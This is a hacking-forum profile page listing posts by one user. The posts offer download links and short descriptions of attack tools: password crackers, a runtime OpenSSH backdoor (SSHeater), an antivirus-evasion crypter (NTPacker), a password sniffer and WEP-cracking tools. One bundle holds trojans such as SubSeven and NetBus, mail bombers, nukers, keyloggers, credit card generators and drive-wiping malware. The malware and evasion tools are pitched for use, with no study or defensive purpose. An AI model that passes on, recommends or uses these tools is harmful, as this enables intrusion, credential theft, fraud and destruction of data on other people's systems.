Jump to content

virusz

Active Members
  • Posts

    1253
  • Joined

  • Last visited

  • Days Won

    6

Posts posted by virusz

  1. Since many people are bugged with this problem

    I have created this thread ..... (keep checking for updates)

    Windows Admin Hack,

    allows you to reset the administrator password on Windows 2000/XP.

    The ISO Must Be Burned to a CD or Flash drive.

    When it is booted, a mini version of linux starts,

    which allows the administrator password to be reset.

    useful if you need to work on a machine, if the password is unknown.

    Download:

    http://home.eunet.no/~pnordahl/ntpasswd/cd050303.zip

    Turotial for using the above tool:

    http://home.eunet.no/~pnordahl/ntpasswd/

    LCP 5.04

    Password auditing and recovery tool for Windows NT/2000/XP/2003.

    Accounts information import: import from local computer, import from remote computer, import from SAM file, import from .LC file, import from .LCS file, import from PwDump file, import from Sniff file.

    Passwords recovering by dictionary attack, brute force attack, hybrid of dictionary and brute force attacks.

    Brute force session distribution: sessions distribution, sessions combining.

    Hashes computing: LM and NT hashes computing by password, LM and NT response computing by password and server challenge.

    Download:

    http://www.fileedge.com/dynamic/download/19221.exe

    Site: http://www.lcpsoft.com

  2. phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

    Download:

    http://www.phpbb.com/development/files/php...hpBB-3.0.B1.zip

  3. SSHeater is a program that infects the OpenSSH daemon in run-time in order to log all future sessions and implement a backdoor where a single password, chosen by the user, can log into all accounts in the system. There's a log parser included in the package that can display authentication information about sessions as well as play the session just like TTYrec/play.

    Download

    http://rapidshare.de/files/21281381/ssheat...1.1.tar.gz.html

    Mirror:

    http://www.megaupload.com/?d=VIYE2QFY

  4. NTPacker_ss.PNG

    What is NTPacker?

    NTPacker is a program that will crypt a file so that it will become undetected by AV's.

    How does NTPacker work?

    The file that is selected will be crypted and packed at the EOF of the stub. Once the created file is run, the stub will read the data

    from the end of the file and write it into a process that is chosen.

    There are 3 different types on encryption to use:

    aPlib - Compresses the server and will then crypt it. This is the most popular method and is still undetected by the majority of AV's.

    An AV may be able to detect the aPlib compressed server. This method is also used by MicroJoiner.

    XOR - XOR will crypt the server with a random value (9 bytes - eg. ECA123BCD). This will make the file undetected. Please note

    that this will be detected if the stub that you use is detected.

    aPlib + XOR - Compresses the file with both aPlib and XOR. The file will first be compressed with aPlib and then encrypted by XOR. This

    will make the file undetected, again, aslong as the stub is undetected too.

    Download:

    http://lobas.info/erazer/Download.php

  5. The most efficient and reliable password sniffer! Win Sniffer is a study in simplicity. Win Sniffer allows network administrators to capture passwords of any network user. Win Sniffer monitors incoming and outgoing network traffic and decodes FTP, POP3, HTTP, ICQ, SMTP, Telnet, IMAP, and NNTP usernames and passwords.

    Unlike other network sniffers, Win Sniffer has advanced, integrated technology that allows it to reconstruct network traffic in a format that is simple to use and understand. While most other network sniffers merely display a list of packets traveling across a network, Win Sniffer will reconstruct each of those packets individually. Thus, capturing a clear and concise image of the integrity of an organizations entire network.

    With Win Sniffer administrators can assess the danger of clear text passwords in the network and develop ways to improve security.

    Win Sniffer 1.3

    http://www.winsniffer.com/ws.exe

    Win Sniffer Console 1.1

    http://www.winsniffer.com/wsc11.zip

  6. tools:

    learn about a nettwork - netstumbler

    capture data (sniffer) - airodump

    discover wep key - aircrack

    decrypt data - 802ether

    http://rapidshare.de/files/2731009/wi-fi.rar.html

    pass: wireless

    view decrypted data - ethereal

    http://www.ethereal.com/distribution/win32/WinPcap_3_1_beta4.exe

  7. #### Clients ####

    back orifice source

    BackDoor v2.0

    DeepThroat v3.1

    Doraah War Engine v1.0b

    Hack 'a' Tack v1.20

    Http Bomber v1.001b

    Kuang2 Client v0.21

    NetBus v1.20

    NetBus v1.70

    NetBus v2.0b Pro

    SchoolBus v1.85

    Shadow Remote Administator & Control v1.04

    Shadow Security Scanner v5.07

    Shadow Security Scanner v5.21

    SubSeven v2.1 Gold Edition

    SubSeven v2.1

    Vampire v1.2

    WebCracker v4.0

    WinCrash v2.0

    wwwhack v1.913

    ------------------

    #### Security ####

    Anti-Keylogger v2.1

    Anti-Trojan v5.5

    Local Port Scanner v1.2.2

    NeoTrace Pro v3.20

    NeoWatch v2.4

    PestPatrol v3.2

    ProPort v2.0

    Trojan remover v3.3.7

    Trojans First Aid Kit v5.0

    ------------------

    #### Serial Software ####

    Angus v3.0

    Dragon v2.0

    KeyGen Killer v1.1

    NEO 2.0b

    Octavius v2.1

    Oscar 2000

    Ripper v1.00

    Serial-0-Matic v2.4

    Serials 2000 Template file - Little Red Wagon

    Serials 2000 v7.1 Crew 2001-9-16

    Serials 2000 v7.2 BytE RippeR 2003-12-15

    Tesla v1.4

    ------------------

    #### Chat ####

    Blue Fire v2.5

    ------------------

    #### Mail Bomb ####

    Anonymous Mail Bomber

    Divine Intervention

    Euthanasia v1.52

    fmbomb

    Homicide

    KaBoom v3.0

    Mail Bomber v8.1

    Mail Fraud

    mailbombv02b

    MiSoSKiaN's Fake Mail

    Nemisis Mail Bomber v1.0

    Poperganda v2.0

    Quick Fyre

    Saddamme v0.2

    SMS Bomber v1.3

    Unabomber

    ------------------

    #### Ping & Nukes ####

    Battle Pong v1.0

    BitchSlap v1.0

    Click v1.4

    Evil FTP Hacker

    Evil Ping v0.3b

    F-ed Up v2.0

    Gimp

    IgmpNuke v1.0

    kod

    LORNuke v2.0

    Meliksah Nuke v2.5

    Muerte v2.1

    Nuke v2.3

    Nuke'em v1.0

    VZMNuker

    WinNuke v95

    ------------------

    #### Keyboard Key Logger ####

    KeyLog98

    KeyTrap v1.0

    ------------------

    #### Java ####

    appletkiller

    attackthread

    consume

    hostile

    nasirc

    scapegoat

    silentthreat

    ungrateful

    wasteful

    ------------------

    #### Port & IP Scaner ####

    Angry IP Scanner v2.08

    a*s Sniffer v1.0.1

    Blues Port Scanner v5

    IP Stealer Utilities

    ITrace32 v2.00

    Porter v1.2

    SuperScan v2.06

    ------------------

    #### Credit Card Generator ####

    CCard Number Generator

    Credit Card Generator v1.0b

    ------------------

    #### Crash Hard Drive ####

    Crash Pentium 2

    Hard Drive Killer Pro v4.0

    Hard Drive Killer Pro v5.0b

    ------------------

    #### Password Recovery Tool ####

    Cain v1.51

    LC3

    ------------------

    Download:

    http://www.megaupload.com/?d=DGPC2EWD

×
×
  • Create New...